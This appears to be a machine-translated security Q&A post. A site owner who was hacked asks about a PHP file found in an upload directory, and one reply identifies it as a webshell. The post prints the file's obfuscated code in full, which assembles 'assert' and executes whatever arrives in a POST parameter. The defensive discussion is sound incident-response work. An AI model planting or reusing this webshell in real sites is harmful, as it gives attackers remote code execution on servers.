File PHP sconosciuto nella mia cartella di caricamento, non è un codice dannoso? [duplicare]

Naviga le tue risposte
2

Recentemente ho scoperto che il mio progetto è stato violato e ho trovato uno script nella mia cartella di immagini che contiene una directory per l'utente per caricare le loro immagini (usando l'input del file). Ecco lo script che ho trovato nella directory.

errot_db.php 

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
    
posta Way Shen 21.11.2016 - 16:47
fonte

1 risposta

1

Ho appena google il codice qui e sembra che una sorta di malware / trojan sia indirizzato all'indirizzo IP filtraggio su un webshell. Potrebbe essere necessario tradurre la pagina in inglese.

    
risposta data 21.11.2016 - 17:04
fonte

Leggi altre domande sui tag

Il punteggio di impatto CVSS corrisponde alla probabilità? Qual è il vantaggio dell'utilizzo di un framework di implementazione specifico rispetto all'utilizzo dei passaggi generici presentati nella maggior parte dei framework di sicurezza sviluppati?